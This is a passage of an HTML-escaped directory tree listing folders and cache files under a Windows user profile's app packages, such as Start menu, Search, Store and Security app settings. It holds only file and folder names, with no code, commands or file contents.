&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.1.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.2.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Apps.ft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Apps.index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Input_{c35999e5-5930-4e39-9cf1-43840021bace}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appsconversions.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; apps.csg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appsglobals.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; apps.schema
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appssynonyms.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settingsconversions.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.csg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settingsglobals.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.schema
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settingssynonyms.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings_{0cb612ef-f332-4975-bda4-7f281a210a65}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.0.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.1.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.2.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings.ft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings.index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings_{12c9aa4a-3644-49c3-91ac-24c749a8fec0}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 0.0.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 0.1.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 0.2.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Settings.ft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Settings.index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DeviceSearchCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997666853414147.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997666931411418.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997666979241086.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997667160997333.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997667313221221.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997667476868926.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997673439917406.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997676440520258.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997676737592545.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997677036511349.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997679695044080.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997681424121100.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997681946766625.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997682071495180.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997682458137951.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997682898295967.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997682976532898.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache133997683207055720.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache134001821369228722.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache134001824124531383.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache134001848284766987.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SettingsCache.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Flighting
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FlightingLogging.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ShellFeeds
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; GLEAM-DARK.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; GLEAM-LIGHT.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TempState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; CortanaUnifiedTileModelCache.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.SecHealthUI_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TempState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; StartUnifiedTileModelCache.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TileCache_100_3_PNGEncoded_Data.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; TileCache_100_3_PNGEncoded_Header.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsStore_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AC
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCookies
